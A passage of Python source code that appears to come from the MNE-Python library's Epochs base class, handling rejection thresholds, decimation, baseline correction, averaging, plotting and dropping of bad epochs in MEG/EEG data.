reject_tmax = self.tmax
elif reject_tmax > tmax:
raise ValueError(f'reject_tmax needs to be None or <= tmax '
f'(got {reject_tmax})')
if (reject_tmin is not None) and (reject_tmax is not None):
if reject_tmin >= reject_tmax:
raise ValueError(f'reject_tmin ({reject_tmin}) needs to be '
f'< reject_tmax ({reject_tmax})')
self.reject_tmin = reject_tmin
self.reject_tmax = reject_tmax
# decimation
self._decim = 1
self.decimate(decim)
# baseline correction: replace `None` tuple elements with actual times
self.baseline = _check_baseline(baseline, times=self.times,
sfreq=self.info['sfreq'])
if self.baseline is not None and self.baseline != baseline:
logger.info(f'Setting baseline interval to '
f'[{self.baseline[0]}, {self.baseline[1]}] sec')
logger.info(_log_rescale(self.baseline))
# setup epoch rejection
self.reject = None
self.flat = None
self._reject_setup(reject, flat)
# do the rest
valid_proj = [True, 'delayed', False]
if proj not in valid_proj:
raise ValueError('"proj" must be one of %s, not %s'
% (valid_proj, proj))
if proj == 'delayed':
self._do_delayed_proj = True
logger.info('Entering delayed SSP mode.')
else:
self._do_delayed_proj = False
activate = False if self._do_delayed_proj else proj
self._projector, self.info = setup_proj(self.info, False,
activate=activate)
if preload_at_end:
assert self._data is None
assert self.preload is False
self.load_data() # this will do the projection
elif proj is True and self._projector is not None and data is not None:
# let's make sure we project if data was provided and proj
# requested
# we could do this with np.einsum, but iteration should be
# more memory safe in most instances
for ii, epoch in enumerate(self._data):
self._data[ii] = np.dot(self._projector, epoch)
self._filename = str(filename) if filename is not None else filename
if raw_sfreq is None:
raw_sfreq = self.info['sfreq']
self._raw_sfreq = raw_sfreq
self._check_consistency()
self.set_annotations(annotations)
def _check_consistency(self):
"""Check invariants of epochs object."""
if hasattr(self, 'events'):
assert len(self.selection) == len(self.events)
assert len(self.drop_log) >= len(self.events)
assert len(self.selection) == sum(
(len(dl) == 0 for dl in self.drop_log))
assert hasattr(self, '_times_readonly')
assert not self.times.flags['WRITEABLE']
assert isinstance(self.drop_log, tuple)
assert all(isinstance(log, tuple) for log in self.drop_log)
assert all(isinstance(s, str) for log in self.drop_log for s in log)
def reset_drop_log_selection(self):
"""Reset the drop_log and selection entries.
This method will simplify ``self.drop_log`` and ``self.selection``
so that they are meaningless (tuple of empty tuples and increasing
integers, respectively). This can be useful when concatenating
many Epochs instances, as ``drop_log`` can accumulate many entries
which can become problematic when saving.
"""
self.selection = np.arange(len(self.events))
self.drop_log = (tuple(),) * len(self.events)
self._check_consistency()
def load_data(self):
"""Load the data if not already preloaded.
Returns
-------
epochs : instance of Epochs
The epochs object.
Notes
-----
This function operates in-place.
.. versionadded:: 0.10.0
"""
if self.preload:
return self
self._data = self._get_data()
self.preload = True
self._do_baseline = False
self._decim_slice = slice(None, None, None)
self._decim = 1
self._raw_times = self.times
assert self._data.shape[-1] == len(self.times)
self._raw = None # shouldn't need it anymore
return self
@verbose
def decimate(self, decim, offset=0, verbose=None):
"""Decimate the epochs.
Parameters
----------
%(decim)s
%(decim_offset)s
%(verbose)s
Returns
-------
epochs : instance of Epochs
The decimated Epochs object.
See Also
--------
mne.Evoked.decimate
mne.Epochs.resample
mne.io.Raw.resample
Notes
-----
%(decim_notes)s
If ``decim`` is 1, this method does not copy the underlying data.
.. versionadded:: 0.10.0
References
----------
.. footbibliography::
"""
decim, offset, new_sfreq = _check_decim(self.info, decim, offset)
start_idx = int(round(-self._raw_times[0] * (self.info['sfreq'] *
self._decim)))
self._decim *= decim
i_start = start_idx % self._decim + offset
decim_slice = slice(i_start, None, self._decim)
with self.info._unlock():
self.info['sfreq'] = new_sfreq
if self.preload:
if decim != 1:
self._data = self._data[:, :, decim_slice].copy()
self._raw_times = self._raw_times[decim_slice].copy()
else:
self._data = np.ascontiguousarray(self._data)
self._decim_slice = slice(None)
self._decim = 1
else:
self._decim_slice = decim_slice
self._set_times(self._raw_times[self._decim_slice])
return self
@verbose
def apply_baseline(self, baseline=(None, 0), *, verbose=None):
"""Baseline correct epochs.
Parameters
----------
%(baseline_epochs)s
Defaults to ``(None, 0)``, i.e. beginning of the data until
time point zero.
%(verbose)s
Returns
-------
epochs : instance of Epochs
The baseline-corrected Epochs object.
Notes
-----
Baseline correction can be done multiple times, but can never be
reverted once the data has been loaded.
.. versionadded:: 0.10.0
"""
baseline = _check_baseline(baseline, times=self.times,
sfreq=self.info['sfreq'])
if self.preload:
if self.baseline is not None and baseline is None:
raise RuntimeError('You cannot remove baseline correction '
'from preloaded data once it has been '
'applied.')
self._do_baseline = True
picks = self._detrend_picks
rescale(self._data, self.times, baseline, copy=False, picks=picks)
self._do_baseline = False
else: # logging happens in "rescale" in "if" branch
logger.info(_log_rescale(baseline))
# For EpochsArray and Epochs, this is already True:
# assert self._do_baseline is True
# ... but for EpochsFIF it's not, so let's set it explicitly
self._do_baseline = True
self.baseline = baseline
return self
def _reject_setup(self, reject, flat):
"""Set self._reject_time and self._channel_type_idx."""
idx = channel_indices_by_type(self.info)
reject = deepcopy(reject) if reject is not None else dict()
flat = deepcopy(flat) if flat is not None else dict()
for rej, kind in zip((reject, flat), ('reject', 'flat')):
if not isinstance(rej, dict):
raise TypeError('reject and flat must be dict or None, not %s'
% type(rej))
bads = set(rej.keys()) - set(idx.keys())
if len(bads) > 0:
raise KeyError('Unknown channel types found in %s: %s'
% (kind, bads))
for key in idx.keys():
# don't throw an error if rejection/flat would do nothing
if len(idx[key]) == 0 and (np.isfinite(reject.get(key, np.inf)) or
flat.get(key, -1) >= 0):
# This is where we could eventually add e.g.
# self.allow_missing_reject_keys check to allow users to
# provide keys that don't exist in data
raise ValueError("No %s channel found. Cannot reject based on "
"%s." % (key.upper(), key.upper()))
# check for invalid values
for rej, kind in zip((reject, flat), ('Rejection', 'Flat')):
for key, val in rej.items():
if val is None or val < 0:
raise ValueError('%s value must be a number >= 0, not "%s"'
% (kind, val))
# now check to see if our rejection and flat are getting more
# restrictive
old_reject = self.reject if self.reject is not None else dict()
old_flat = self.flat if self.flat is not None else dict()
bad_msg = ('{kind}["{key}"] == {new} {op} {old} (old value), new '
'{kind} values must be at least as stringent as '
'previous ones')
# copy thresholds for channel types that were used previously, but not
# passed this time
for key in set(old_reject) - set(reject):
reject[key] = old_reject[key]
# make sure new thresholds are at least as stringent as the old ones
for key in reject:
if key in old_reject and reject[key] > old_reject[key]:
raise ValueError(
bad_msg.format(kind='reject', key=key, new=reject[key],
old=old_reject[key], op='>'))
# same for flat thresholds
for key in set(old_flat) - set(flat):
flat[key] = old_flat[key]
for key in flat:
if key in old_flat and flat[key] < old_flat[key]:
raise ValueError(
bad_msg.format(kind='flat', key=key, new=flat[key],
old=old_flat[key], op='<'))
# after validation, set parameters
self._bad_dropped = False
self._channel_type_idx = idx
self.reject = reject if len(reject) > 0 else None
self.flat = flat if len(flat) > 0 else None
if (self.reject_tmin is None) and (self.reject_tmax is None):
self._reject_time = None
else:
if self.reject_tmin is None:
reject_imin = None
else:
idxs = np.nonzero(self.times >= self.reject_tmin)[0]
reject_imin = idxs[0]
if self.reject_tmax is None:
reject_imax = None
else:
idxs = np.nonzero(self.times <= self.reject_tmax)[0]
reject_imax = idxs[-1]
self._reject_time = slice(reject_imin, reject_imax)
@verbose # verbose is used by mne-realtime
def _is_good_epoch(self, data, verbose=None):
"""Determine if epoch is good."""
if isinstance(data, str):
return False, (data,)
if data is None:
return False, ('NO_DATA',)
n_times = len(self.times)
if data.shape[1] < n_times:
# epoch is too short, i.e. it is at the end of the data
return False, ('TOO_SHORT',)
if self.reject is None and self.flat is None:
return True, None
else:
if self._reject_time is not None:
data = data[:, self._reject_time]
return _is_good(data, self.ch_names, self._channel_type_idx,
self.reject, self.flat, full_report=True,
ignore_chs=self.info['bads'])
@verbose
def _detrend_offset_decim(self, epoch, picks, verbose=None):
"""Aux Function: detrend, baseline correct, offset, decim.
Note: operates inplace
"""
if (epoch is None) or isinstance(epoch, str):
return epoch
# Detrend
if self.detrend is not None:
# We explicitly detrend just data channels (not EMG, ECG, EOG which
# are processed by baseline correction)
use_picks = _pick_data_channels(self.info, exclude=())
epoch[use_picks] = detrend(epoch[use_picks], self.detrend, axis=1)
# Baseline correct
if self._do_baseline:
rescale(
epoch, self._raw_times, self.baseline, picks=picks, copy=False,
verbose=False)
# Decimate if necessary (i.e., epoch not preloaded)
epoch = epoch[:, self._decim_slice]
# handle offset
if self._offset is not None:
epoch += self._offset
return epoch
def iter_evoked(self, copy=False):
"""Iterate over epochs as a sequence of Evoked objects.
The Evoked objects yielded will each contain a single epoch (i.e., no
averaging is performed).
This method resets the object iteration state to the first epoch.
Parameters
----------
copy : bool
If False, copies of data and measurement info will be omitted
to save time.
"""
self.__iter__()
while True:
try:
out = self.__next__(True)
except StopIteration:
break
data, event_id = out
tmin = self.times[0]
info = self.info
if copy:
info = deepcopy(self.info)
data = data.copy()
yield EvokedArray(data, info, tmin, comment=str(event_id))
def subtract_evoked(self, evoked=None):
"""Subtract an evoked response from each epoch.
Can be used to exclude the evoked response when analyzing induced
activity, see e.g. [1]_.
Parameters
----------
evoked : instance of Evoked | None
The evoked response to subtract. If None, the evoked response
is computed from Epochs itself.
Returns
-------
self : instance of Epochs
The modified instance (instance is also modified inplace).
References
----------
.. [1] David et al. "Mechanisms of evoked and induced responses in
MEG/EEG", NeuroImage, vol. 31, no. 4, pp. 1580-1591, July 2006.
"""
logger.info('Subtracting Evoked from Epochs')
if evoked is None:
picks = _pick_data_channels(self.info, exclude=[])
evoked = self.average(picks)
# find the indices of the channels to use
picks = pick_channels(evoked.ch_names, include=self.ch_names)
# make sure the omitted channels are not data channels
if len(picks) < len(self.ch_names):
sel_ch = [evoked.ch_names[ii] for ii in picks]
diff_ch = list(set(self.ch_names).difference(sel_ch))
diff_idx = [self.ch_names.index(ch) for ch in diff_ch]
diff_types = [channel_type(self.info, idx) for idx in diff_idx]
bad_idx = [diff_types.index(t) for t in diff_types if t in
_DATA_CH_TYPES_SPLIT]
if len(bad_idx) > 0:
bad_str = ', '.join([diff_ch[ii] for ii in bad_idx])
raise ValueError('The following data channels are missing '
'in the evoked response: %s' % bad_str)
logger.info(' The following channels are not included in the '
'subtraction: %s' % ', '.join(diff_ch))
# make sure the times match
if (len(self.times) != len(evoked.times) or
np.max(np.abs(self.times - evoked.times)) >= 1e-7):
raise ValueError('Epochs and Evoked object do not contain '
'the same time points.')
# handle SSPs
if not self.proj and evoked.proj:
warn('Evoked has SSP applied while Epochs has not.')
if self.proj and not evoked.proj:
evoked = evoked.copy().apply_proj()
# find the indices of the channels to use in Epochs
ep_picks = [self.ch_names.index(evoked.ch_names[ii]) for ii in picks]
# do the subtraction
if self.preload:
self._data[:, ep_picks, :] -= evoked.data[picks][None, :, :]
else:
if self._offset is None:
self._offset = np.zeros((len(self.ch_names), len(self.times)),
dtype=np.float64)
self._offset[ep_picks] -= evoked.data[picks]
logger.info('[done]')
return self
@fill_doc
def average(self, picks=None, method="mean", by_event_type=False):
"""Compute an average over epochs.
Parameters
----------
%(picks_all_data)s
method : str | callable
How to combine the data. If "mean"/"median", the mean/median
are returned.
Otherwise, must be a callable which, when passed an array of shape
(n_epochs, n_channels, n_time) returns an array of shape
(n_channels, n_time).
Note that due to file type limitations, the kind for all
these will be "average".
%(by_event_type)s
Returns
-------
%(by_event_type_returns_average)s
Notes
-----
Computes an average of all epochs in the instance, even if
they correspond to different conditions. To average by condition,
do ``epochs[condition].average()`` for each condition separately.
When picks is None and epochs contain only ICA channels, no channels
are selected, resulting in an error. This is because ICA channels
are not considered data channels (they are of misc type) and only data
channels are selected when picks is None.
The ``method`` parameter allows e.g. robust averaging.
For example, one could do:
>>> from scipy.stats import trim_mean # doctest:+SKIP
>>> trim = lambda x: trim_mean(x, 0.1, axis=0) # doctest:+SKIP
>>> epochs.average(method=trim) # doctest:+SKIP
This would compute the trimmed mean.
"""
if by_event_type:
evokeds = list()
for event_type in self.event_id.keys():
ev = self[event_type]._compute_aggregate(picks=picks,
mode=method)
ev.comment = event_type
evokeds.append(ev)
else:
evokeds = self._compute_aggregate(picks=picks, mode=method)
return evokeds
@fill_doc
def standard_error(self, picks=None, by_event_type=False):
"""Compute standard error over epochs.
Parameters
----------
%(picks_all_data)s
%(by_event_type)s
Returns
-------
%(by_event_type_returns_stderr)s
"""
return self.average(picks=picks, method="std",
by_event_type=by_event_type)
def _compute_aggregate(self, picks, mode='mean'):
"""Compute the mean, median, or std over epochs and return Evoked."""
# if instance contains ICA channels they won't be included unless picks
# is specified
if picks is None:
check_ICA = [x.startswith('ICA') for x in self.ch_names]
if np.all(check_ICA):
raise TypeError('picks must be specified (i.e. not None) for '
'ICA channel data')
elif np.any(check_ICA):
warn('ICA channels will not be included unless explicitly '
'selected in picks')
n_channels = len(self.ch_names)
n_times = len(self.times)
if self.preload:
n_events = len(self.events)
fun = _check_combine(mode, valid=('mean', 'median', 'std'))
data = fun(self._data)
assert len(self.events) == len(self._data)
if data.shape != self._data.shape[1:]:
raise RuntimeError(
'You passed a function that resulted in data of shape {}, '
'but it should be {}.'.format(
data.shape, self._data.shape[1:]))
else:
if mode not in {"mean", "std"}:
raise ValueError("If data are not preloaded, can only compute "
"mean or standard deviation.")
data = np.zeros((n_channels, n_times))
n_events = 0
for e in self:
if np.iscomplexobj(e):
data = data.astype(np.complex128)
data += e
n_events += 1
if n_events > 0:
data /= n_events
else:
data.fill(np.nan)
# convert to stderr if requested, could do in one pass but do in
# two (slower) in case there are large numbers
if mode == "std":
data_mean = data.copy()
data.fill(0.)
for e in self:
data += (e - data_mean) ** 2
data = np.sqrt(data / n_events)
if mode == "std":
kind = 'standard_error'
data /= np.sqrt(n_events)
else:
kind = "average"
return self._evoked_from_epoch_data(data, self.info, picks, n_events,
kind, self._name)
@property
def _name(self):
"""Give a nice string representation based on event ids."""
if len(self.event_id) == 1:
comment = next(iter(self.event_id.keys()))
else:
count = Counter(self.events[:, 2])
comments = list()
for key, value in self.event_id.items():
comments.append('%.2f × %s' % (
float(count[value]) / len(self.events), key))
comment = ' + '.join(comments)
return comment
def _evoked_from_epoch_data(self, data, info, picks, n_events, kind,
comment):
"""Create an evoked object from epoch data."""
info = deepcopy(info)
# don't apply baseline correction; we'll set evoked.baseline manually
evoked = EvokedArray(data, info, tmin=self.times[0], comment=comment,
nave=n_events, kind=kind, baseline=None)
evoked.baseline = self.baseline
# the above constructor doesn't recreate the times object precisely
# due to numerical precision issues
evoked.times = self.times.copy()
# pick channels
picks = _picks_to_idx(self.info, picks, 'data_or_ica', ())
ch_names = [evoked.ch_names[p] for p in picks]
evoked.pick_channels(ch_names)
if len(evoked.info['ch_names']) == 0:
raise ValueError('No data channel found when averaging.')
if evoked.nave < 1:
warn('evoked object is empty (based on less than 1 epoch)')
return evoked
@property
def ch_names(self):
"""Channel names."""
return self.info['ch_names']
@copy_function_doc_to_method_doc(plot_epochs)
def plot(self, picks=None, scalings=None, n_epochs=20, n_channels=20,
title=None, events=None, event_color=None,
order=None, show=True, block=False, decim='auto', noise_cov=None,
butterfly=False, show_scrollbars=True, show_scalebars=True,
epoch_colors=None, event_id=None, group_by='type'):
return plot_epochs(self, picks=picks, scalings=scalings,
n_epochs=n_epochs, n_channels=n_channels,
title=title, events=events, event_color=event_color,
order=order, show=show, block=block, decim=decim,
noise_cov=noise_cov, butterfly=butterfly,
show_scrollbars=show_scrollbars,
show_scalebars=show_scalebars,
epoch_colors=epoch_colors, event_id=event_id,
group_by=group_by)
@copy_function_doc_to_method_doc(plot_epochs_psd)
def plot_psd(self, fmin=0, fmax=np.inf, tmin=None, tmax=None,
proj=False, bandwidth=None, adaptive=False, low_bias=True,
normalization='length', picks=None, ax=None, color='black',
xscale='linear', area_mode='std', area_alpha=0.33,
dB=True, estimate='auto', show=True, n_jobs=1,
average=False, line_alpha=None, spatial_colors=True,
sphere=None, exclude='bads', verbose=None):
return plot_epochs_psd(self, fmin=fmin, fmax=fmax, tmin=tmin,
tmax=tmax, proj=proj, bandwidth=bandwidth,
adaptive=adaptive, low_bias=low_bias,
normalization=normalization, picks=picks, ax=ax,
color=color, xscale=xscale, area_mode=area_mode,
area_alpha=area_alpha, dB=dB, estimate=estimate,
show=show, n_jobs=n_jobs, average=average,
line_alpha=line_alpha,
spatial_colors=spatial_colors, sphere=sphere,
exclude=exclude, verbose=verbose)
@copy_function_doc_to_method_doc(plot_epochs_psd_topomap)
def plot_psd_topomap(self, bands=None, tmin=None,
tmax=None, proj=False, bandwidth=None, adaptive=False,
low_bias=True, normalization='length', ch_type=None,
cmap=None, agg_fun=None, dB=True,
n_jobs=1, normalize=False, cbar_fmt='auto',
outlines='head', axes=None, show=True,
sphere=None, vlim=(None, None), verbose=None):
return plot_epochs_psd_topomap(
self, bands=bands, tmin=tmin, tmax=tmax,
proj=proj, bandwidth=bandwidth, adaptive=adaptive,
low_bias=low_bias, normalization=normalization, ch_type=ch_type,
cmap=cmap, agg_fun=agg_fun, dB=dB, n_jobs=n_jobs,
normalize=normalize, cbar_fmt=cbar_fmt, outlines=outlines,
axes=axes, show=show, sphere=sphere, vlim=vlim, verbose=verbose)
@copy_function_doc_to_method_doc(plot_topo_image_epochs)
def plot_topo_image(self, layout=None, sigma=0., vmin=None, vmax=None,
colorbar=None, order=None, cmap='RdBu_r',
layout_scale=.95, title=None, scalings=None,
border='none', fig_facecolor='k', fig_background=None,
font_color='w', show=True):
return plot_topo_image_epochs(
self, layout=layout, sigma=sigma, vmin=vmin, vmax=vmax,
colorbar=colorbar, order=order, cmap=cmap,
layout_scale=layout_scale, title=title, scalings=scalings,
border=border, fig_facecolor=fig_facecolor,
fig_background=fig_background, font_color=font_color, show=show)
@verbose
def drop_bad(self, reject='existing', flat='existing', verbose=None):
"""Drop bad epochs without retaining the epochs data.
Should be used before slicing operations.
.. warning:: This operation is slow since all epochs have to be read
from disk. To avoid reading epochs from disk multiple
times, use :meth:`mne.Epochs.load_data()`.
.. note:: To constrain the time period used for estimation of signal
quality, set ``epochs.reject_tmin`` and
``epochs.reject_tmax``, respectively.
Parameters
----------
%(reject_drop_bad)s
%(flat_drop_bad)s
%(verbose)s
Returns
-------
epochs : instance of Epochs
The epochs with bad epochs dropped. Operates in-place.
Notes
-----
Dropping bad epochs can be done multiple times with different
``reject`` and ``flat`` parameters. However, once an epoch is
dropped, it is dropped forever, so if more lenient thresholds may
subsequently be applied, `epochs.copy <mne.Epochs.copy>` should be
used.
"""
if reject == 'existing':
if flat == 'existing' and self._bad_dropped:
return
reject = self.reject
if flat == 'existing':
flat = self.flat
if any(isinstance(rej, str) and rej != 'existing' for
rej in (reject, flat)):
raise ValueError('reject and flat, if strings, must be "existing"')
self._reject_setup(reject, flat)
self._get_data(out=False, verbose=verbose)
return self
def drop_log_stats(self, ignore=('IGNORED',)):
"""Compute the channel stats based on a drop_log from Epochs.
Parameters
----------
ignore : list
The drop reasons to ignore.
Returns
-------
perc : float
Total percentage of epochs dropped.
See Also
--------
plot_drop_log
"""
return _drop_log_stats(self.drop_log, ignore)
@copy_function_doc_to_method_doc(plot_drop_log)
def plot_drop_log(self, threshold=0, n_max_plot=20, subject=None,
color=(0.9, 0.9, 0.9), width=0.8, ignore=('IGNORED',),
show=True):
if not self._bad_dropped:
raise ValueError("You cannot use plot_drop_log since bad "
"epochs have not yet been dropped. "
"Use epochs.drop_bad().")
return plot_drop_log(self.drop_log, threshold, n_max_plot, subject,
color=color, width=width, ignore=ignore,
show=show)
@copy_function_doc_to_method_doc(plot_epochs_image)
def plot_image(self, picks=None, sigma=0., vmin=None, vmax=None,
colorbar=True, order=None, show=True, units=None,
scalings=None, cmap=None, fig=None, axes=None,
overlay_times=None, combine=None, group_by=None,
evoked=True, ts_args=None, title=None, clear=False):
return plot_epochs_image(self, picks=picks, sigma=sigma, vmin=vmin,
vmax=vmax, colorbar=colorbar, order=order,
show=show, units=units, scalings=scalings,
cmap=cmap, fig=fig, axes=axes,
overlay_times=overlay_times, combine=combine,
group_by=group_by, evoked=evoked,
ts_args=ts_args, title=title, clear=clear)
@verbose
def drop(self, indices, reason='USER', verbose=None):
"""Drop epochs based on indices or boolean mask.
.. note:: The indices refer to the current set of undropped epochs
rather than the complete set of dropped and undropped epochs.
They are therefore not necessarily consistent with any
external indices (e.g., behavioral logs). To drop epochs
based on external criteria, do not use the ``preload=True``
flag when constructing an Epochs object, and call this
method before calling the :meth:`mne.Epochs.drop_bad` or
:meth:`mne.Epochs.load_data` methods.
Parameters
----------
indices : array of int or bool
Set epochs to remove by specifying indices to remove or a boolean
mask to apply (where True values get removed). Events are
correspondingly modified.
reason : str
Reason for dropping the epochs ('ECG', 'timeout', 'blink' etc).
Default: 'USER'.
%(verbose)s
Returns
-------
epochs : instance of Epochs
The epochs with indices dropped. Operates in-place.
"""
indices = np.atleast_1d(indices)
if indices.ndim > 1:
raise ValueError("indices must be a scalar or a 1-d array")
if indices.dtype == bool:
indices = np.where(indices)[0]
try_idx = np.where(indices < 0, indices + len(self.events), indices)
out_of_bounds = (try_idx < 0) | (try_idx >= len(self.events))
if out_of_bounds.any():
first = indices[out_of_bounds][0]
raise IndexError("Epoch index %d is out of bounds" % first)
keep = np.setdiff1d(np.arange(len(self.events)), try_idx)
self._getitem(keep, reason, copy=False, drop_event_id=False)
count = len(try_idx)
logger.info('Dropped %d epoch%s: %s' %
(count, _pl(count), ', '.join(map(str, np.sort(try_idx)))))
return self
def _get_epoch_from_raw(self, idx, verbose=None):
"""Get a given epoch from disk."""
raise NotImplementedError
def _project_epoch(self, epoch):
"""Process a raw epoch based on the delayed param."""
# whenever requested, the first epoch is being projected.
if (epoch is None) or isinstance(epoch, str):
# can happen if t < 0 or reject based on annotations
return epoch
proj = self._do_delayed_proj or self.proj
if self._projector is not None and proj is True:
epoch = np.dot(self._projector, epoch)
return epoch
@verbose
def _get_data(self, out=True, picks=None, item=None, *, units=None,
tmin=None, tmax=None, verbose=None):
"""Load all data, dropping bad epochs along the way.
Parameters
----------
out : bool
Return the data. Setting this to False is used to reject bad
epochs without caching all the data, which saves memory.
%(picks_all)s
item : slice | array-like | str | list | None
See docstring of get_data method.
%(units)s
tmin : int | float | None
Start time of data to get in seconds.
tmax : int | float | None
End time of data to get in seconds.
%(verbose)s
"""
start, stop = self._handle_tmin_tmax(tmin, tmax)
if item is None:
item = slice(None)
elif not self._bad_dropped:
raise ValueError(
'item must be None in epochs.get_data() unless bads have been '
'dropped. Consider using epochs.drop_bad().')
select = self._item_to_select(item) # indices or slice
use_idx = np.arange(len(self.events))[select]
n_events = len(use_idx)
# in case there are no good events
if self.preload:
# we will store our result in our existing array
data = self._data
else:
# we start out with an empty array, allocate only if necessary
data = np.empty((0, len(self.info['ch_names']), len(self.times)))
msg = (f'for {n_events} events and {len(self._raw_times)} '
'original time points')
if self._decim > 1:
msg += ' (prior to decimation)'
if getattr(self._raw, "preload", False):
logger.info(f'Using data from preloaded Raw {msg} ...')
else:
logger.info(f'Loading data {msg} ...')
orig_picks = picks
if orig_picks is None:
picks = _picks_to_idx(self.info, picks, "all", exclude=())
else:
picks = _picks_to_idx(self.info, picks)
# handle units param only if we are going to return data (out==True)
if (units is not None) and out:
ch_factors = _get_ch_factors(self, units, picks)
if self._bad_dropped:
if not out:
return
if self.preload:
data = data[select]
if orig_picks is not None:
data = data[:, picks]
if units is not None:
data *= ch_factors[:, np.newaxis]
if start != 0 or stop != self.times.size:
data = data[..., start:stop]
return data
# we need to load from disk, drop, and return data
detrend_picks = self._detrend_picks
for ii, idx in enumerate(use_idx):
# faster to pre-allocate memory here
epoch_noproj = self._get_epoch_from_raw(idx)
epoch_noproj = self._detrend_offset_decim(
epoch_noproj, detrend_picks)
if self._do_delayed_proj:
epoch_out = epoch_noproj
else:
epoch_out = self._project_epoch(epoch_noproj)
if ii == 0:
data = np.empty((n_events, len(self.ch_names),
len(self.times)), dtype=epoch_out.dtype)
data[ii] = epoch_out
else:
# bads need to be dropped, this might occur after a preload
# e.g., when calling drop_bad w/new params
good_idx = []
n_out = 0
drop_log = list(self.drop_log)
assert n_events == len(self.selection)
if not self.preload:
detrend_picks = self._detrend_picks
for idx, sel in enumerate(self.selection):
if self.preload: # from memory
if self._do_delayed_proj:
epoch_noproj = self._data[idx]
epoch = self._project_epoch(epoch_noproj)
else:
epoch_noproj = None
epoch = self._data[idx]
else: # from disk
epoch_noproj = self._get_epoch_from_raw(idx)
epoch_noproj = self._detrend_offset_decim(
epoch_noproj, detrend_picks)
epoch = self._project_epoch(epoch_noproj)
epoch_out = epoch_noproj if self._do_delayed_proj else epoch
is_good, bad_tuple = self._is_good_epoch(
epoch, verbose=verbose)
if not is_good:
assert isinstance(bad_tuple, tuple)
assert all(isinstance(x, str) for x in bad_tuple)
drop_log[sel] = drop_log[sel] + bad_tuple
continue
good_idx.append(idx)
# store the epoch if there is a reason to (output or update)
if out or self.preload:
# faster to pre-allocate, then trim as necessary
if n_out == 0 and not self.preload:
data = np.empty((n_events, epoch_out.shape[0],
epoch_out.shape[1]),
dtype=epoch_out.dtype, order='C')
data[n_out] = epoch_out
n_out += 1
self.drop_log = tuple(drop_log)
del drop_log
self._bad_dropped = True
logger.info("%d bad epochs dropped" % (n_events - len(good_idx)))
# adjust the data size if there is a reason to (output or update)
if out or self.preload:
if data.flags['OWNDATA'] and data.flags['C_CONTIGUOUS']:
data.resize((n_out,) + data.shape[1:], refcheck=False)
else:
data = data[:n_out]
if self.preload:
self._data = data
# Now update our properties (except data, which is already fixed)
self._getitem(good_idx, None, copy=False, drop_event_id=False,
select_data=False)
if out:
if orig_picks is not None:
data = data[:, picks]
if units is not None:
data *= ch_factors[:, np.newaxis]
if start != 0 or stop != self.times.size:
data = data[..., start:stop]
return data
else:
return None
@property
def _detrend_picks(self):
if self._do_baseline:
return _pick_data_channels(
self.info, with_ref_meg=True, with_aux=True, exclude=())
else:
return []
@fill_doc
def get_data(self, picks=None, item=None, units=None, tmin=None,
tmax=None):
"""Get all epochs as a 3D array.
Parameters
----------
%(picks_all)s
item : slice | array-like | str | list | None
The items to get. See :meth:`mne.Epochs.__getitem__` for
a description of valid options. This can be substantially faster
for obtaining an ndarray than :meth:`~mne.Epochs.__getitem__`
for repeated access on large Epochs objects.
None (default) is an alias for ``slice(None)``.
.. versionadded:: 0.20
%(units)s
.. versionadded:: 0.24
tmin : int | float | None
Start time of data to get in seconds.
.. versionadded:: 0.24.0
tmax : int | float | None
End time of data to get in seconds.
.. versionadded:: 0.24.0
Returns
-------
data : array of shape (n_epochs, n_channels, n_times)
A view on epochs data.
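Examples
--------
A minimal sketch, assuming ``epochs`` is an existing `~mne.Epochs`
instance containing EEG channels; the returned array has shape
(n_epochs, n_channels, n_times):
>>> data = epochs.get_data()  # doctest: +SKIP
>>> eeg = epochs.get_data(picks='eeg', tmin=0., tmax=0.3)  # doctest: +SKIP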
"""
return self._get_data(picks=picks, item=item, units=units, tmin=tmin,
tmax=tmax)
@verbose
def apply_function(self, fun, picks=None, dtype=None, n_jobs=1,
channel_wise=True, verbose=None, **kwargs):
"""Apply a function to a subset of channels.
%(applyfun_summary_epochs)s
Parameters
----------
%(applyfun_fun)s
%(picks_all_data_noref)s
%(applyfun_dtype)s
%(n_jobs)s
%(applyfun_chwise_epo)s
%(verbose)s
%(kwarg_fun)s
Returns
-------
self : instance of Epochs
The epochs object with transformed data.
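Examples
--------
A minimal sketch, assuming ``epochs`` is a preloaded `~mne.Epochs`
instance with EEG channels; the demeaning function is illustrative
only (it must return an array of the same shape it receives):
>>> epochs.apply_function(lambda x: x - x.mean(), picks='eeg')  # doctest: +SKIP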
"""
_check_preload(self, 'epochs.apply_function')
picks = _picks_to_idx(self.info, picks, exclude=(), with_ref_meg=False)
if not callable(fun):
raise ValueError('fun needs to be a function')
data_in = self._data
if dtype is not None and dtype != self._data.dtype:
self._data = self._data.astype(dtype)
if channel_wise:
if n_jobs == 1:
_fun = partial(_check_fun, fun, **kwargs)
# modify data inplace to save memory
for idx in picks:
self._data[:, idx, :] = np.apply_along_axis(
_fun, -1, data_in[:, idx, :])
else:
# use parallel function
parallel, p_fun, _ = parallel_func(_check_fun, n_jobs)
data_picks_new = parallel(p_fun(
fun, data_in[:, p, :], **kwargs) for p in picks)
for pp, p in enumerate(picks):
self._data[:, p, :] = data_picks_new[pp]
else:
self._data = _check_fun(fun, data_in, **kwargs)
return self
@property
def times(self):
"""Time vector in seconds."""
return self._times_readonly
def _set_times(self, times):
"""Set self._times_readonly (and make it read only)."""
# naming used to indicate that it shouldn't be
# changed directly, but rather via this method
self._times_readonly = times.copy()
self._times_readonly.flags['WRITEABLE'] = False
@property
def tmin(self):
"""First time point."""
return self.times[0]
@property
def filename(self):
"""The filename."""
return self._filename
@property
def tmax(self):
"""Last time point."""
return self.times[-1]
def __repr__(self):
"""Build string representation."""
s = ' %s events ' % len(self.events)
s += '(all good)' if self._bad_dropped else '(good & bad)'
s += ', %g - %g sec' % (self.tmin, self.tmax)
s += ', baseline '
if self.baseline is None:
s += 'off'
else:
s += f'{self.baseline[0]:g} – {self.baseline[1]:g} sec'
if self.baseline != _check_baseline(
self.baseline, times=self.times, sfreq=self.info['sfreq'],
on_baseline_outside_data='adjust'):
s += ' (baseline period was cropped after baseline correction)'
s += ', ~%s' % (sizeof_fmt(self._size),)
s += ', data%s loaded' % ('' if self.preload else ' not')
s += ', with metadata' if self.metadata is not None else ''
max_events = 10
counts = ['%r: %i' % (k, sum(self.events[:, 2] == v))
for k, v in list(self.event_id.items())[:max_events]]
if len(self.event_id) > 0:
s += ',' + '\n '.join([''] + counts)
if len(self.event_id) > max_events:
not_shown_events = len(self.event_id) - max_events
s += f"\n and {not_shown_events} more events ..."
class_name = self.__class__.__name__
class_name = 'Epochs' if class_name == 'BaseEpochs' else class_name
return '<%s | %s>' % (class_name, s)
